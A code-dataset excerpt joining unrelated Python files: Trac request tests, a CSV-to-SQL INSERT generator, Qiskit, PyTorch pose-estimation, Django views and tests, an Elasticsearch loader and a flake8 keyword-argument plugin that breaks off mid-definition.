        self.assertEqual(u'resumé', args[0][1])
        self.assertIsInstance(args[1][0], unicode)
        self.assertEqual(u'résumé', args[1][0])

    def test_qs_unicode(self):
        # Percent-encoded '=' and '&' inside keys/values must be unescaped
        # without being treated as separators.
        args = parse_arg_list(u'ké%3Dy=re%26su=mé&résu%26mé')
        self.assertIsInstance(args[0][0], unicode)
        self.assertIsInstance(args[0][1], unicode)
        self.assertEqual(u'ké=y', args[0][0])
        self.assertEqual(u're&su=mé', args[0][1])
        self.assertIsInstance(args[1][0], unicode)
        self.assertEqual(u'résu&mé', args[1][0])
class HTTPExceptionTestCase(unittest.TestCase):
    """Tests for the unicode rendering of `HTTPInternalError` wrappers."""

    def test_tracerror_with_string_as_argument(self):
        e1 = TracError('the message')
        e2 = HTTPInternalError(e1)
        # Wrapping a TracError keeps 'Trac Error' in the status line.
        self.assertEqual('500 Trac Error (the message)', unicode(e2))

    def test_tracerror_with_fragment_as_argument(self):
        # Markup fragments are rendered into the message unescaped.
        e1 = TracError(tag(tag.b('the message')))
        e2 = HTTPInternalError(e1)
        self.assertEqual('500 Trac Error (<b>the message</b>)', unicode(e2))

    def test_exception_with_string_as_argument(self):
        # Plain exceptions render with the generic 'Internal Server Error'.
        e1 = Exception('the message')
        e2 = HTTPInternalError(e1)
        self.assertEqual('500 Internal Server Error (the message)',
                         unicode(e2))

    def test_exception_with_fragment_as_argument(self):
        e1 = Exception(tag(tag.b('the message')))
        e2 = HTTPInternalError(e1)
        self.assertEqual('500 Internal Server Error (<b>the message</b>)',
                         unicode(e2))
def suite():
    """Aggregate all request-related test cases into a single suite."""
    cases = (
        RequestTestCase,
        RequestSendFileTestCase,
        SendErrorTestCase,
        ParseArgListTestCase,
        HTTPExceptionTestCase,
    )
    result = unittest.TestSuite()
    for case in cases:
        result.addTest(unittest.makeSuite(case))
    return result
# Run the aggregated suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| StarcoderdataPython |
22742 | #!/usr/bin/python
import argparse
import csv
import sys
'''
This script takes a CSV file with a mandatory header row and an SQL table
name, and converts the data in the CSV file into an SQL INSERT statement.
'''
def parse_arguments():
    """Parse command line arguments.

    Returns:
        argparse.Namespace with ``csvFile`` (an open readable file),
        ``tablename`` (required) and ``delimiter`` (defaults to ',').
    """
    parser = argparse.ArgumentParser(
        description='Takes a csv file and a tablename and creates an SQL insert statement')
    parser.add_argument('csvFile', type=argparse.FileType('r'),
                        help='The CSV file to be read')
    parser.add_argument('-t', '--table', dest='tablename', required=True,
                        help='The name of the destination SQL table')
    parser.add_argument('-d', '--delimiter', dest='delimiter', default=',',
                        help='The delimiter used in the CSV')
    return parser.parse_args()


# Rows per INSERT statement.  NOTE: the original comment claimed a limit of
# 1000 inserts, but the code has always batched 10 rows per statement.
_BATCH_SIZE = 10


def main():
    """Read the CSV named on the command line and print INSERT statements.

    The first CSV row is treated as the column header.  Data rows are
    emitted in batches of ``_BATCH_SIZE`` rows per INSERT statement,
    written to stdout.
    """
    args = parse_arguments()
    with args.csvFile as f:
        reader = csv.reader(f, delimiter=args.delimiter, quoting=csv.QUOTE_ALL)
        # Build the "INSERT INTO `table` (col, ...) VALUES " prefix once;
        # it is repeated at the start of every batch.
        columns = next(reader)
        header_row = ('INSERT INTO `' + args.tablename + '` ('
                      + ', '.join(columns) + ') VALUES ')
        for counter, row in enumerate(reader):
            if counter % _BATCH_SIZE == 0:
                if counter != 0:
                    # Terminate the previous statement before a new batch.
                    sys.stdout.write(';\n')
                sys.stdout.write(header_row)
            else:
                sys.stdout.write(',')
            # Escape single quotes by doubling them (SQL literal rule).
            # NOTE(review): mapping a literal `""` inside a value to NULL
            # yields the *string* 'NULL', not an SQL NULL -- behaviour kept
            # from the original; confirm intent.  (The original also chained
            # a no-op .replace('&', '&'), which has been dropped.)
            values = ', '.join(
                "'" + item.replace("'", "''").replace('""', 'NULL') + "'"
                for item in row)
            sys.stdout.write('(' + values + ')')
        sys.stdout.write(';')


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3219204 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
The Univariate Normal Distribution.
"""
from scipy.stats.distributions import norm
from qiskit.aqua.utils.validation import validate_min
from .univariate_distribution import UnivariateDistribution
class NormalDistribution(UnivariateDistribution):
    """
    The Univariate Normal Distribution.

    The continuous normal pdf is sampled on an equidistant grid of
    ``2 ** num_target_qubits`` points in ``[low, high]`` via
    ``UnivariateDistribution.pdf_to_probabilities``.
    """

    def __init__(self,
                 num_target_qubits: int,
                 mu: float = 0,
                 sigma: float = 1,
                 low: float = -1,
                 high: float = 1) -> None:
        r"""
        Args:
            num_target_qubits: number of qubits it acts on,
                has a min. value of 1.
            mu: expected value of considered normal distribution
            sigma: standard deviation of considered normal distribution
            low: lower bound, i.e., the value corresponding to \|0...0>
                (assuming an equidistant grid)
            high: upper bound, i.e., the value corresponding to \|1...1>
                (assuming an equidistant grid)
        """
        validate_min('num_target_qubits', num_target_qubits, 1)
        # Discretize scipy's norm.pdf over the grid; pdf_to_probabilities
        # also returns the grid itself, which is not needed here.
        probabilities, _ = UnivariateDistribution.\
            pdf_to_probabilities(
                lambda x: norm.pdf(x, mu, sigma), low, high, 2 ** num_target_qubits)
        super().__init__(num_target_qubits, probabilities, low, high)
| StarcoderdataPython |
60709 | <gh_stars>10-100
from typing import List
from pydantic import BaseModel
class User(BaseModel):
    """Pydantic model for a user: identifier, name and bot flag."""
    id: str        # user identifier (kept as a string)
    username: str  # account name
    bot: bool      # True when this account is a bot
class Ready(BaseModel):
    """Pydantic model for a READY payload: version, session id, user
    and shard pair."""
    version: str
    session_id: str
    user: User
    # Use typing.List (imported at module level but previously unused)
    # instead of ``list[int]``: identical validation semantics, but also
    # valid on Python < 3.9 where ``list[int]`` is not subscriptable.
    shard: List[int]
1736901 | import sys
class VendorImporter:
    """
    A PEP 302 meta path importer for finding optionally-vendored
    or otherwise naturally-installed packages from root_name.
    """

    def __init__(self, root_name, vendored_names=(), vendor_pkg=None):
        # Package under which vendored submodules are requested.
        self.root_name = root_name
        self.vendored_names = set(vendored_names)
        # Default vendor package is derived by substituting 'extern' with
        # '_vendor' -- assumes root_name contains 'extern'; TODO confirm.
        self.vendor_pkg = vendor_pkg or root_name.replace('extern', '_vendor')

    @property
    def search_path(self):
        """
        Search first the vendor package then as a natural package.
        """
        # Prefixes tried in order: '<vendor_pkg>.' then '' (top level).
        yield self.vendor_pkg + '.'
        yield ''

    def find_module(self, fullname, path=None):
        """
        Return self when fullname starts with root_name and the
        target module is one vendored through this importer.
        """
        root, base, target = fullname.partition(self.root_name + '.')
        # partition() leaves the whole name in `root` when the separator is
        # absent, so a non-empty `root` means fullname is not under root_name.
        if root:
            return
        if not any(map(target.startswith, self.vendored_names)):
            return
        return self

    def load_module(self, fullname):
        """
        Iterate over the search path to locate and load fullname.
        """
        root, base, target = fullname.partition(self.root_name + '.')
        for prefix in self.search_path:
            try:
                extant = prefix + target
                __import__(extant)
                mod = sys.modules[extant]
                # Alias the loaded module under the requested dotted name.
                sys.modules[fullname] = mod
                # mysterious hack:
                # Remove the reference to the extant package/module
                # on later Python versions to cause relative imports
                # in the vendor package to resolve the same modules
                # as those going through this importer.
                if sys.version_info > (3, 3):
                    del sys.modules[extant]
                return mod
            except ImportError:
                pass
        else:
            # for/else: reached only when no prefix yielded an importable
            # module (each attempt raised ImportError).
            raise ImportError(
                "The '{target}' package is required; "
                "normally this is bundled with this package so if you get "
                "this warning, consult the packager of your "
                "distribution.".format(**locals())
            )

    def install(self):
        """
        Install this importer into sys.meta_path if not already present.
        """
        if self not in sys.meta_path:
            sys.meta_path.append(self)
# Vendored package names this importer is responsible for resolving.
names = ('packaging', 'pyparsing', 'six', 'appdirs')
VendorImporter(__name__, names).install()
| StarcoderdataPython |
1704955 | <reponame>jbeezley/SMQTK
from __future__ import division, print_function
import unittest
import mock
from smqtk.algorithms.nn_index.lsh.functors import \
LshFunctor, get_lsh_functor_impls
class TestLshFunctorImplGetter (unittest.TestCase):
    """Verify that `get_lsh_functor_impls` forwards the expected plugin
    discovery arguments to `plugin.get_plugins`."""

    @mock.patch('smqtk.algorithms.nn_index.lsh.functors.plugin.get_plugins')
    def test_get_lsh_functor_impls_no_reload(self, m_get_plugins):
        get_lsh_functor_impls()
        m_get_plugins.assert_called_once()
        self.assertEqual(m_get_plugins.call_args[0][0],
                         'smqtk.algorithms.nn_index.lsh.functors')
        # call_args[0][1] is a filesystem path and is deliberately not
        # asserted (it depends on the installation location).
        self.assertEqual(m_get_plugins.call_args[0][2],
                         'LSH_FUNCTOR_PATH')
        self.assertEqual(m_get_plugins.call_args[0][3],
                         'LSH_FUNCTOR_CLASS')
        self.assertEqual(m_get_plugins.call_args[0][4],
                         LshFunctor)
        # The default call must not force module reloading.
        self.assertFalse(m_get_plugins.call_args[1]['reload_modules'])

    @mock.patch('smqtk.algorithms.nn_index.lsh.functors.plugin.get_plugins')
    def test_get_lsh_functor_impls_with_reload(self, m_get_plugins):
        get_lsh_functor_impls(True)
        m_get_plugins.assert_called_once()
        self.assertEqual(m_get_plugins.call_args[0][0],
                         'smqtk.algorithms.nn_index.lsh.functors')
        # m_get_plugins.call_args[0][1] is a path depending on where the python
        # code is.
        self.assertEqual(m_get_plugins.call_args[0][2],
                         'LSH_FUNCTOR_PATH')
        self.assertEqual(m_get_plugins.call_args[0][3],
                         'LSH_FUNCTOR_CLASS')
        self.assertEqual(m_get_plugins.call_args[0][4],
                         LshFunctor)
        # Passing True must request module reloading.
        self.assertTrue(m_get_plugins.call_args[1]['reload_modules'])
| StarcoderdataPython |
133675 | '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
from elasticsearch.helpers import bulk
import boto3
from elasticsearch.exceptions import ElasticsearchException
import config
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
# import Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger.config as config
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger.tweet_utils import \
# get_tweet, id_field, get_tweet_mapping
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
# AWS / Elasticsearch connection configuration.
region = 'us-east-2'  # e.g. us-west-1
service = 'es'
# SigV4 signing credentials from the ambient boto3 session
# (environment variables, shared profile, or instance role).
credentials = boto3.Session().get_credentials()
awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region,
                   service, session_token=credentials.token)
# Destination index and bulk batch size (from the project config module).
index_name = 'twitter'
bulk_chunk_size = config.es_bulk_chunk_size
def create_index(es, index_name, mapping):
    """Create the named index on the given client with the supplied mapping."""
    message = 'creating index {}...'.format(index_name)
    print(message)
    es.indices.create(index_name, body=mapping)
def load(tweets):
    """Bulk-index the given tweet documents into the 'twitter' index.

    Ensures the index exists with an up-to-date mapping (recreating it if
    the new mapping conflicts with the old one), then indexes the tweets
    in chunks of ``bulk_chunk_size`` documents.
    """
    # es = Elasticsearch(host = config.es_host, port = config.es_port)
    es = Elasticsearch(
        hosts=[{'host': config.es_host, 'port': config.es_port}],
        http_auth=awsauth,
        use_ssl=True,
        verify_certs=True,
        connection_class=RequestsHttpConnection
    )
    # The mapping format depends on the server's major version.
    es_version_number = es.info()['version']['number']
    mapping_to_put = get_tweet_mapping(es_version_number)
    print(mapping_to_put)
    # mapping = {doc_type: tweet_mapping
    #            }
    mapping = {'mappings': mapping_to_put}
    if es.indices.exists(index_name):
        print('index {} already exists'.format(index_name))
        try:
            es.indices.put_mapping(body=mapping_to_put, index=index_name)
        except ElasticsearchException as e:
            # Mapping update rejected: drop the index and rebuild it from
            # scratch with the new mapping.
            print('error putting mapping:\n' + str(e))
            print('deleting index {}...'.format(index_name))
            es.indices.delete(index_name)
            create_index(es, index_name, mapping)
    else:
        print('index {} does not exist'.format(index_name))
        create_index(es, index_name, mapping)
    counter = 0
    bulk_data = []
    list_size = len(tweets)
    for doc in tweets:
        tweet = get_tweet(doc)
        bulk_doc = {
            "_index": index_name,
            # "_type": doc_type,
            "_id": tweet[id_field],
            "_source": tweet
        }
        bulk_data.append(bulk_doc)
        counter += 1
        # Flush a full chunk, or the final (possibly partial) chunk.
        if counter % bulk_chunk_size == 0 or counter == list_size:
            print("ElasticSearch bulk index (index: {INDEX})...".format(
                INDEX=index_name))
            success, _ = bulk(es, bulk_data)
            print('ElasticSearch indexed %d documents' % success)
            bulk_data = []
| StarcoderdataPython |
70598 | # ------------------------------------------------------------------------------
# Modified from https://github.com/microsoft/human-pose-estimation.pytorch
# ------------------------------------------------------------------------------
import torch.nn as nn
from ..resnet import _resnet, Bottleneck
class Upsampling(nn.Sequential):
    """
    3-layers deconvolution used in `Simple Baseline <https://arxiv.org/abs/1804.06208>`_.

    Each stage doubles the spatial resolution with a stride-2
    ``ConvTranspose2d`` followed by ``BatchNorm2d`` and ``ReLU``.

    Args:
        in_channel (int): channels of the input feature map.
        hidden_dims (tuple): output channels of each deconv stage.
        kernel_sizes (tuple): kernel size (2, 3 or 4) of each stage.
        bias (bool): whether the deconvolutions use a bias term.

    Raises:
        ValueError: if ``hidden_dims`` and ``kernel_sizes`` differ in length.
        NotImplementedError: for a kernel size other than 2, 3 or 4.
    """

    def __init__(self, in_channel=2048, hidden_dims=(256, 256, 256), kernel_sizes=(4, 4, 4), bias=False):
        # Raise a real exception instead of `assert`: asserts are stripped
        # when Python runs with -O, which would silently skip validation.
        if len(hidden_dims) != len(kernel_sizes):
            raise ValueError(
                'ERROR: len(hidden_dims) is different len(kernel_sizes)')
        layers = []
        for hidden_dim, kernel_size in zip(hidden_dims, kernel_sizes):
            # padding/output_padding are chosen so each stage exactly
            # doubles the spatial size:
            #   out = (in - 1) * 2 - 2 * padding + kernel_size + output_padding
            if kernel_size == 4:
                padding = 1
                output_padding = 0
            elif kernel_size == 3:
                padding = 1
                output_padding = 1
            elif kernel_size == 2:
                padding = 0
                output_padding = 0
            else:
                raise NotImplementedError("kernel_size is {}".format(kernel_size))
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=in_channel,
                    out_channels=hidden_dim,
                    kernel_size=kernel_size,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=bias))
            layers.append(nn.BatchNorm2d(hidden_dim))
            layers.append(nn.ReLU(inplace=True))
            in_channel = hidden_dim
        super(Upsampling, self).__init__(*layers)
        # Initialization following Simple Baseline: small normal weights
        # for the deconvolutions, identity-like batch norm.
        for name, m in self.named_modules():
            if isinstance(m, nn.ConvTranspose2d):
                nn.init.normal_(m.weight, std=0.001)
                if bias:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
class PoseResNet(nn.Module):
    """
    `Simple Baseline <https://arxiv.org/abs/1804.06208>`_ for keypoint detection.

    Args:
        backbone (torch.nn.Module): Backbone to extract 2-d features from data
        upsampling (torch.nn.Module): Layer to upsample image feature to heatmap size
        feature_dim (int): The dimension of the features from upsampling layer.
        num_keypoints (int): Number of keypoints
        finetune (bool, optional): Whether use 10x smaller learning rate in the backbone. Default: False
    """

    def __init__(self, backbone, upsampling, feature_dim, num_keypoints, finetune=False):
        super(PoseResNet, self).__init__()
        self.backbone = backbone
        self.upsampling = upsampling
        self.head = nn.Conv2d(in_channels=feature_dim, out_channels=num_keypoints,
                              kernel_size=1, stride=1, padding=0)
        self.finetune = finetune
        # Head initialisation: small normal weights, zero bias.
        for module in self.head.modules():
            nn.init.normal_(module.weight, std=0.001)
            nn.init.constant_(module.bias, 0)

    def forward(self, x):
        features = self.backbone(x)
        heatmaps = self.head(self.upsampling(features))
        return heatmaps

    def get_parameters(self, lr=1.):
        # The backbone optionally trains at a 10x smaller learning rate.
        backbone_lr = 0.1 * lr if self.finetune else lr
        return [
            {'params': self.backbone.parameters(), 'lr': backbone_lr},
            {'params': self.upsampling.parameters(), 'lr': lr},
            {'params': self.head.parameters(), 'lr': lr},
        ]
def _pose_resnet(arch, num_keypoints, block, layers, pretrained_backbone, deconv_with_bias, finetune=False, progress=True, **kwargs):
    """Assemble a PoseResNet: ResNet backbone + deconvolution upsampling.

    Args:
        arch (str): resnet architecture name passed to ``_resnet``.
        num_keypoints (int): number of predicted keypoint heatmaps.
        block: residual block class for the backbone (e.g. Bottleneck).
        layers (list): per-stage block counts for the backbone.
        pretrained_backbone (bool): load pre-trained backbone weights.
        deconv_with_bias (bool): use bias in the deconvolution layers.
        finetune (bool, optional): use 10x smaller backbone learning rate.
        progress (bool, optional): display a download progress bar.
    """
    backbone = _resnet(arch, block, layers, pretrained_backbone, progress, **kwargs)
    upsampling = Upsampling(backbone.out_features, bias=deconv_with_bias)
    # 256 matches the last hidden dim of the default Upsampling stack.
    model = PoseResNet(backbone, upsampling, 256, num_keypoints, finetune)
    return model
def pose_resnet101(num_keypoints, pretrained_backbone=True, deconv_with_bias=False, finetune=False, progress=True, **kwargs):
    """Constructs a Simple Baseline model with a ResNet-101 backbone.

    Args:
        num_keypoints (int): number of keypoints
        pretrained_backbone (bool, optional): If True, returns a model pre-trained on ImageNet. Default: True.
        deconv_with_bias (bool, optional): Whether use bias in the deconvolution layer. Default: False
        finetune (bool, optional): Whether use 10x smaller learning rate in the backbone. Default: False
        progress (bool, optional): If True, displays a progress bar of the download to stderr. Default: True

    Returns:
        PoseResNet: backbone + upsampling + keypoint-head model.
    """
    # [3, 4, 23, 3] are the standard ResNet-101 stage depths.
    return _pose_resnet('resnet101', num_keypoints, Bottleneck, [3, 4, 23, 3], pretrained_backbone, deconv_with_bias, finetune, progress, **kwargs)
3399501 | from time import sleep
termo1 = int(input('Digite o primeiro termo da progressão: '))
razao = int(input('Digite a razão da progressão: '))
# Show the first ten terms of the arithmetic progression.  Computing each
# term from its index (term = termo1 + n * razao) also handles razao == 0:
# the original range(termo1, decimo + razao, razao) loop crashed there,
# since range() rejects a step of zero.
for indice in range(10):
    termo = termo1 + indice * razao
    print(' {} '.format(termo), end='=>')
    sleep(0.3)
print(' Acabou')
| StarcoderdataPython |
4824749 | <gh_stars>1-10
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""It lists ops of RaggedTensor for the interest of test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_bitwise_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import string_ops
# Constants listing various op types to test. Each operation
# should be included in at least one list below, or tested separately if
# necessary (e.g., because it expects additional arguments).

# Elementwise unary ops taking a single float (or complex) tensor.
UNARY_FLOAT_OPS = [
    math_ops.abs,
    math_ops.acos,
    math_ops.acosh,
    math_ops.angle,
    math_ops.asin,
    math_ops.asinh,
    math_ops.atan,
    math_ops.atanh,
    math_ops.ceil,
    math_ops.conj,
    math_ops.cos,
    math_ops.cosh,
    math_ops.digamma,
    math_ops.erf,
    math_ops.erfc,
    math_ops.erfcinv,
    math_ops.erfinv,
    math_ops.exp,
    math_ops.expm1,
    math_ops.floor,
    math_ops.imag,
    math_ops.is_finite,
    math_ops.is_inf,
    math_ops.is_nan,
    math_ops.lgamma,
    math_ops.log,
    math_ops.log1p,
    math_ops.log_sigmoid,
    math_ops.ndtri,
    math_ops.negative,
    math_ops.real,
    math_ops.reciprocal,
    math_ops.reciprocal_no_nan,
    math_ops.rint,
    math_ops.round,
    math_ops.rsqrt,
    math_ops.sign,
    math_ops.sigmoid,
    math_ops.sin,
    math_ops.sinh,
    math_ops.softplus,
    math_ops.sqrt,
    math_ops.square,
    math_ops.tan,
    math_ops.tanh,
    array_ops.identity,
    array_ops.ones_like,
    array_ops.zeros_like,
    special_math_ops.bessel_i0,
    special_math_ops.bessel_i0e,
    special_math_ops.bessel_i1,
    special_math_ops.bessel_i1e,
]
# Elementwise unary ops taking a single bool tensor.
UNARY_BOOL_OPS = [
    math_ops.logical_not,
]
# Elementwise unary ops taking a single string tensor.
UNARY_STRING_OPS = [
    string_ops.decode_base64,
    string_ops.encode_base64,
    string_ops.string_strip,
    parsing_ops.decode_compressed,
]
# Elementwise binary ops taking two float tensors.
BINARY_FLOAT_OPS = [
    math_ops.add,
    math_ops.atan2,
    math_ops.complex,
    math_ops.div_no_nan,
    math_ops.divide,
    math_ops.equal,
    math_ops.floordiv,
    math_ops.floormod,
    math_ops.greater,
    math_ops.greater_equal,
    math_ops.less,
    math_ops.less_equal,
    math_ops.maximum,
    math_ops.minimum,
    math_ops.multiply,
    math_ops.multiply_no_nan,
    math_ops.not_equal,
    math_ops.pow,
    math_ops.realdiv,
    math_ops.squared_difference,
    math_ops.subtract,
    math_ops.truediv,
]
# Elementwise binary ops taking two bool tensors.
BINARY_BOOL_OPS = [
    math_ops.logical_and,
    math_ops.logical_or,
    math_ops.logical_xor,
]
# Elementwise unary ops taking a single integer tensor.
UNARY_INT_OPS = [
    gen_bitwise_ops.invert,
    string_ops.unicode_script,
]
# Elementwise binary ops taking two integer tensors.
BINARY_INT_OPS = [
    gen_bitwise_ops.bitwise_and,
    gen_bitwise_ops.bitwise_or,
    gen_bitwise_ops.bitwise_xor,
    gen_bitwise_ops.left_shift,
    gen_bitwise_ops.right_shift,
    math_ops.truncatediv,
    math_ops.truncatemod,
]
| StarcoderdataPython |
1762172 | from django.shortcuts import render
from django.http import JsonResponse
from . import tasks
import storage.rcache as rcache
# Create your views here.
def update_stock_info(request):
    """Schedule the async stock-basics refresh for AJAX POST requests."""
    if request.method == 'POST' and request.is_ajax():
        tasks.update_stock_basics.delay()
        status = '成功'
    else:
        status = '失败'
    return JsonResponse({'status': status})
def update_history(request):
    """Schedule the async full-history refresh for AJAX POST requests."""
    if request.method == 'POST' and request.is_ajax():
        tasks.update_all_history.delay()
        status = '成功'
    else:
        status = '失败'
    return JsonResponse({'status': status})
def update_tick_data(request):
    """Schedule the async tick-data refresh for AJAX POST requests."""
    if request.method == 'POST' and request.is_ajax():
        tasks.update_tick.delay()
        status = '成功'
    else:
        status = '失败'
    return JsonResponse({'status': status})
def update_fundamental(request):
    """Dispatch an async fundamentals refresh for the requested table.

    POST parameters: ``db`` (table key), ``year`` and ``month``; the
    month is mapped to its calendar quarter before dispatching.
    """
    _updater_handle = {
        'report_data': tasks.update_report_data.delay,
        'profit_data': tasks.update_profit_data.delay,
        'operation_data': tasks.update_operation_data.delay,
        'growth_data': tasks.update_growth_data.delay,
        'debtpaying_data': tasks.update_debtpaying_data.delay,
        'cashflow_data': tasks.update_cashflow_data.delay,
    }
    _month_to_quarter = {
        1: 1, 2: 1, 3: 1,
        4: 2, 5: 2, 6: 2,
        7: 3, 8: 3, 9: 3,
        10: 4, 11: 4, 12: 4,
    }
    if request.method == 'POST' and request.is_ajax():
        db = request.POST.get('db')
        year = int(request.POST.get('year'))
        month = int(request.POST.get('month'))
        _updater_handle[db](year, _month_to_quarter[month])
        status = '成功'
    else:
        status = '失败'
    return JsonResponse({'status': status})
def update_time(request):
    """Return the last-refresh timestamp of every cached dataset."""
    cache_keys = {
        "basic_info": rcache.KEY_TS_BASIC_INFO,
        "history": rcache.KEY_TS_HISTORY,
        "tick_data": rcache.KEY_TS_TICK_DATA,
        "report_data": rcache.KEY_TS_REPORT_DATA,
        "profit_data": rcache.KEY_TS_PROFIT_DATA,
        "operation_data": rcache.KEY_TS_OPERATION_DATA,
        "growth_data": rcache.KEY_TS_GROWTH_DATA,
        "debtpaying_data": rcache.KEY_TS_DEBTPAYING_DATA,
        "cashflow_data": rcache.KEY_TS_CASHFLOW_DATA,
    }
    return JsonResponse({name: rcache.get_timestamp(key)
                         for name, key in cache_keys.items()})
| StarcoderdataPython |
1642428 | from django.test import TestCase, Client
from django.urls import reverse
from django.contrib.auth.models import User
from products.models import Category, Product
class TestProductViews(TestCase):
    """Test the product views for all users."""

    def setUp(self):
        """Create a user, a category and a product; resolve the URLs used
        by the tests."""
        self.client = Client()
        # NOTE(review): self.user is created but never logged in or
        # referenced by these tests -- confirm whether it is still needed.
        self.user = User.objects.create_user(
            username='testuser',
            email='<EMAIL>',
            password='<PASSWORD>'
        )
        self.category = Category.objects.create(
            name="test_category",
            friendly_name="Test Category"
        )
        self.product = Product.objects.create(
            category=self.category,
            sku="1",
            name="test product",
            description="test description",
            price="2.99",
            rating="4",
            image="testimage.jpg",
            has_sizes=False,
        )
        self.products = reverse("products")
        self.product_detail = reverse("product_detail",
                                      kwargs={"product_id": self.product.id})

    def test_products_view(self):
        ''' Test the products view '''
        response = self.client.get(self.products)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "products/products.html")
        self.assertTemplateUsed(response, "base.html")

    def test_products_views_with_sort(self):
        ''' Test the products view with a direction parameter '''
        response = self.client.get(self.products,
                                   {"sort": "name",
                                    "direction": "desc"})
        context = response.context
        # The view is expected to echo the combined sort key into context.
        self.assertTrue(context['current_sorting'])
        self.assertEqual(context['current_sorting'], "name_desc")

    def test_view_product_detail_view(self):
        ''' Test the product_detail view '''
        response = self.client.get(self.product_detail)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "products/product_detail.html")
        self.assertTemplateUsed(response, "base.html")
| StarcoderdataPython |
3270821 | <reponame>isac322/flake8-force-keyword-arguments
import ast
import importlib
import re
import sys
from argparse import Namespace
from itertools import chain
from typing import ClassVar, Iterable, Tuple, Type
from flake8.options.manager import OptionManager
from marisa_trie import Trie
import flake8_force_keyword_arguments
from flake8_force_keyword_arguments import util
if sys.version_info < (3, 8):
from typing_extensions import Final
else:
from typing import Final
if sys.version_info < (3, 9):
from typing import Pattern
else:
from re import Pattern
# Threshold: calls reaching this many positional arguments are reported.
DEFAULT_MAX_POS_ARGS: Final[int] = 2
# Regex of callables exempt from the check by default (logging calls,
# attribute dunders, typing.cast).
DEFAULT_IGNORE_PATTERNS: Final[str] = (
    r'(:?'
    r'^logger.(:?log|debug|info|warning|error|exception|critical)$'
    r'|__setattr__$'
    r'|__delattr__$'
    r'|__getattr__$'
    r'|^(:?typing\.)?cast$'
    r')'
)
# Modules inspected at startup for positional-only callables.
DEFAULT_INSPECT_MODULES: Final[Tuple[str, ...]] = ('builtins',)
# Whether inspected callables are registered by bare name, qualified
# name, or both.
DEFAULT_QUALIFIER_OPTION: Final[util.QualifierOption] = util.QualifierOption.BOTH
class Checker:
    """Flake8 plugin that reports calls using too many positional arguments."""

    name: Final[str] = flake8_force_keyword_arguments.__name__
    version: Final[str] = flake8_force_keyword_arguments.__version__
    MESSAGE_TEMPLATE: Final[
        str
    ] = 'FKA100 {function_name}\'s call uses {number_of_args} positional arguments, use keyword arguments.'

    # Class-level configuration shared by all Checker instances; populated
    # once per run by parse_options().
    _max_pos_args: ClassVar[int] = DEFAULT_MAX_POS_ARGS
    _ignore_patterns: ClassVar[Tuple[Pattern[str], ...]] = ()
    _ignore_trie: ClassVar[Trie]

    # The module AST under inspection.
    _tree: ast.AST

    def __init__(self, tree: ast.AST) -> None:
        """Store the module AST to be scanned by run()."""
        self._tree = tree

    @classmethod
    def add_options(cls, parser: OptionManager) -> None:
        """Register this plugin's command line / config options with flake8."""
        parser.add_option(  # pragma: no cover
            '--kwargs-max-positional-arguments',
            type=int,
            dest='max_positional_arguments',
            default=DEFAULT_MAX_POS_ARGS,
            parse_from_config=True,
            help='How many positional arguments are allowed (default: %(default)s)',
        )
        parser.add_option(  # pragma: no cover
            '--kwargs-ignore-function-pattern',
            type=str,
            dest='ignore_function_pattern',
            default=DEFAULT_IGNORE_PATTERNS,
            parse_from_config=True,
            help='Ignore pattern list (default: %(default)s)',
        )
        parser.add_option(  # pragma: no cover
            '--kwargs-ignore-function-pattern-extend',
            type=str,
            dest='ignore_function_pattern_extend',
            default=None,
            parse_from_config=True,
            help='Extend ignore pattern list.',
        )
        parser.add_option(  # pragma: no cover
            '--kwargs-inspect-module',
            dest='inspect_module',
            comma_separated_list=True,
            default=DEFAULT_INSPECT_MODULES,
            parse_from_config=True,
            help=(
                'Inspect module level constructor of classes or functions to gather positional only callables '
                'and ignore it on lint. Note that methods are not subject to inspection. (default: %(default)s)'
            ),
        )
        parser.add_option(  # pragma: no cover
            '--kwargs-inspect-module-extend',
            dest='inspect_module_extend',
            comma_separated_list=True,
            default=(),
            parse_from_config=True,
            help='Extend --kwargs-inspect-module',
        )
        parser.add_option(  # pragma: no cover
            '--kwargs-inspect-qualifier-option',
            type=util.QualifierOption,
            dest='inspect_qualifier_option',
            choices=tuple(map(lambda v: v.value, util.QualifierOption.__members__.values())),
            default=DEFAULT_QUALIFIER_OPTION.value,
            parse_from_config=True,
            help=(
                'For detected positional only callables by inspection, option to append the qualifier or not. '
                'e.g. In case builtins.setattr(), '
                '`both` will register `builtins.setattr` and `setattr` as positional only function. '
                '`only_name` will register `setattr` and `only_with_qualifier` will register `builtins.setattr`. '
                '(default: %(default)s)'
            ),
